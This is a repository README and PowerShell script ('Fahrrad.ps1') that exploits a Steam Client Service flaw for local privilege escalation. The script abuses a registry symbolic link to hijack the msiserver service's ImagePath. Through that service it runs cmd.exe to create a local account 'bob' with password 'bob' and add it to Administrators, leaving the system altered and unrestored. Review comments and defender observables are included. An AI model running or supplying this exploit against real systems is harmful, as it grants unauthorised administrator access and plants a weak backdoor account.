├── README.md
└── Fahrrad.ps1

/README.md:
--------------------------------------------------------------------------------
# steam-privesc

A privilege escalation exploit in the Steam Client

credits go to Vasily Kravets, more info here: https://amonitoring.ru/article/steamclient-0day/

Steam fixed the issue in the current beta, make sure to patch: https://steamcommunity.com/groups/SteamClientBeta#announcements/detail/1602638506845644644
--------------------------------------------------------------------------------

/Fahrrad.ps1:
--------------------------------------------------------------------------------
#Fahrrad.ps1

# This is a privilege escalation exploit for the Steam Client. Uses registry symlinks. Check it out at https://github.com/alexanderbittner/steam-privesc/ .
#
# This program is only intended for research purposes.
# USE AT YOUR OWN RISK and please don't break anyone's system.
#
# PoC that was useful for developing this: https://gist.github.com/enigma0x3/03f065be011c5980b96855e2741bf302
# credits go to Vasily Kravets @ https://amonitoring.ru/article/steamclient-0day/
#
# What the script does, in order (every step is visible below):
#   1. deletes HKLM\SOFTWARE\WOW6432Node\Valve\Steam\NSIS and recreates that path as a
#      registry symbolic link whose target is the msiserver service key;
#   2. starts the Steam Client Service;
#   3. overwrites msiserver's ImagePath with a cmd.exe command line and starts msiserver,
#      twice: once to create local user "bob", once to add it to Administrators.
#
# NOTE(review): nothing here is undone. The deleted NSIS key is not backed up, the symlink
# is left in place, and msiserver's original ImagePath is never read or restored, so
# Windows Installer is presumably left unable to start until that value is repaired.
# Run only on a disposable VM or snapshot.
#
# Observables for defenders (all taken from the commands below): a registry symbolic link
# created under HKLM\SOFTWARE\WOW6432Node\Valve\Steam, a change of
# HKLM\SYSTEM\CurrentControlSet\Services\msiserver\ImagePath to a cmd.exe command line,
# and a new local account "bob" being added to the Administrators group.

# NtObjectManager supplies the NtApiDotNet.NtKey type used to create the symlink below.
import-module NTObjectManager
Write-Host "Deleting reg key HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
# Delete the real key so the same path can be recreated as a link. The key is not saved.
# NOTE(review): if NSIS has subkeys, Remove-Item without -Recurse prompts for confirmation
# instead of deleting - confirm on the target.
Remove-Item -Path "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"

Write-Host "Making reg symlink HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS -> HKLM:\SYSTEM\CurrentControlSet\Services\msiserver"
# Arguments appear to be: link path, root object ($null = the path is absolute), link target.
# Presumably the privileged Steam service operates on keys under Valve\Steam and follows
# the link into the msiserver key, which is what lets the later ImagePath writes matter;
# the mechanism is described in the linked article, not shown here - TODO confirm.
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\NSIS",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\msiserver")
Write-Host "[*] Registry Symbolic link created"

#start steam client service
# Presumably runs with higher privileges than the caller - that is the escalation the
# README refers to; confirm against the linked write-up.
Write-Host "[*] Starting client service..."
Start-Service "Steam Client Service"
Write-Host "[*] Started. Waiting a few seconds..."

Start-Sleep 1
# Banner only (an ASCII-art bicycle - "Fahrrad"). Back-ticks escape `$ inside the
# double-quoted strings so PowerShell does not expand them as variables.
Write-Host ""
Write-Host " `$^ *."
Write-Host " d`$`$`$`$`$`$`$P^ `$ J"
Write-Host " ^$. 4r^ "
Write-Host " d^b .db^"
Write-Host " P $ e^ $"
Write-Host " ..ec.. .^ *. zP $.zec.."
Write-Host " .^ 3*b. *. .P^ .@^4F ^4"
Write-Host " .^ d^ ^b. *c .`$^ d^ $ %"
Write-Host " / P $. ^c d^ @ 3r 3"
Write-Host " 4 .eE........$r===e`$`$`$`$eeP J *.. b"
Write-Host " $ `$`$`$`$`$ `$ 4`$`$`$`$`$`$`$ F d`$`$`$. 4"
Write-Host " $ `$`$`$`$`$ `$ 4`$`$`$`$`$`$`$ L *`$`$`$^ 4"
Write-Host " 4 ^ ^^3P ===`$`$`$`$`$`$^ 3 P"
Write-Host " * `$ ^^^ b J"
Write-Host " ^. .P %. @"
Write-Host " %. z*^ ^%. .r^"
Write-Host " ^*==*^^ ^^*==*^^"
Write-Host ""

Start-Sleep 2
Write-Host "The Fahrrad is ready."
Start-Sleep 1
Write-Host "[!] Setting payload: Adding new user bob"
# Payload 1: point the Windows Installer service binary at a cmd.exe one-liner. The original
# ImagePath is not read first, so it cannot be restored later. The new account gets a
# hard-coded, trivially guessable password - on a real host that is a lasting weakness.
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c net user /add bob bob"

Start-Sleep 1
#start msiserver
# Starting the service runs whatever ImagePath now names. NOTE(review): cmd.exe is not a
# service binary, so Start-Service may report an error even if the command ran; the
# `net user bob` at the end is the actual check.
Write-Host "[*] Starting msiserver, this should execute the payload."
Start-Service "msiserver"

Start-Sleep 5
Write-Host "[!] Setting payload: Making bob admin"
# Payload 2: same technique, this time adding "bob" to the local Administrators group.
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c net localgroup administrators bob /add"

Start-Sleep 1
#start msiserver
Write-Host "[*] Starting msiserver, this should execute the payload."
Start-Service "msiserver"

# Printed unconditionally - nothing above checks whether either service start actually ran
# its command line. The `net user bob` output below is the only real indication.
Write-Host "Successfully added admin user with credentials bob:bob."
net user bob
--------------------------------------------------------------------------------